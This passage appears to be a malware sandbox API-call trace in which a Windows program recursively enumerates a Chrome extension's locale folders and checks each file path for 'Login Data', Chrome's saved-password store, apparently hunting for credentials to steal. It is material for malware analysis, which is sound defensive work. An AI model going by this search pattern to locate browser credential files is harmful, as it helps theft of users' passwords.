HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 137 [0161.522] lstrlenW (lpString="\\") returned 1 [0161.522] GetProcessHeap () returned 0x8e0000 [0161.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.522] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0161.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\" [0161.522] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\") returned 138 [0161.522] lstrlenW (lpString="messages.json") returned 13 [0161.522] GetProcessHeap () returned 0x8e0000 [0161.522] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.522] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\" [0161.522] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" [0161.522] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.522] GetProcessHeap () returned 0x8e0000 [0161.522] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.522] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json", lpSrch="Login Data") returned 0x0 [0161.522] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.522] GetProcessHeap () returned 0x8e0000 [0161.522] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.522] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.522] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.523] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.523] GetProcessHeap () returned 0x8e0000 [0161.523] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.523] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.523] GetProcessHeap () returned 0x8e0000 [0161.523] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.523] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="bg", cAlternateFileName="")) returned 1 [0161.523] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0161.523] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0161.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.523] lstrlenW (lpString="\\") returned 1 [0161.523] GetProcessHeap () returned 0x8e0000 [0161.523] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.523] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.523] lstrlenW (lpString="bg") returned 2 [0161.523] GetProcessHeap () returned 0x8e0000 [0161.523] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.523] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0161.523] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.523] GetProcessHeap () returned 0x8e0000 [0161.523] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 137 [0161.523] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 137 [0161.523] lstrlenW (lpString="\\*.*") returned 4 [0161.523] GetProcessHeap () returned 0x8e0000 [0161.523] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0161.523] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*" [0161.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.524] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.524] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.524] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.524] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.524] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.524] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned 137 [0161.524] lstrlenW (lpString="\\") returned 1 [0161.524] GetProcessHeap () returned 0x8e0000 [0161.524] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.524] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg" [0161.524] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\" [0161.524] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\") returned 138 [0161.524] lstrlenW (lpString="messages.json") returned 13 [0161.524] GetProcessHeap () returned 0x8e0000 [0161.524] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.524] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\" [0161.524] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" [0161.524] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.524] GetProcessHeap () returned 0x8e0000 [0161.524] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.524] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json", lpSrch="Login Data") returned 0x0 [0161.524] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.524] GetProcessHeap () returned 0x8e0000 [0161.524] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.524] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.524] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.524] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.525] GetProcessHeap () returned 0x8e0000 [0161.525] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.525] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.525] GetProcessHeap () returned 0x8e0000 [0161.525] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.525] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ca", cAlternateFileName="")) returned 1 [0161.525] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0161.525] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0161.525] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.525] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.525] lstrlenW (lpString="\\") returned 1 [0161.525] GetProcessHeap () returned 0x8e0000 [0161.525] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.525] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.525] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.525] lstrlenW (lpString="ca") returned 2 [0161.525] GetProcessHeap () returned 0x8e0000 [0161.525] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.525] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0161.525] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.525] GetProcessHeap () returned 0x8e0000 [0161.525] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.525] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 137 [0161.525] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned 137 [0161.525] lstrlenW (lpString="\\*.*") returned 4 [0161.525] GetProcessHeap () returned 0x8e0000 [0161.525] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca" [0161.525] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*.*") 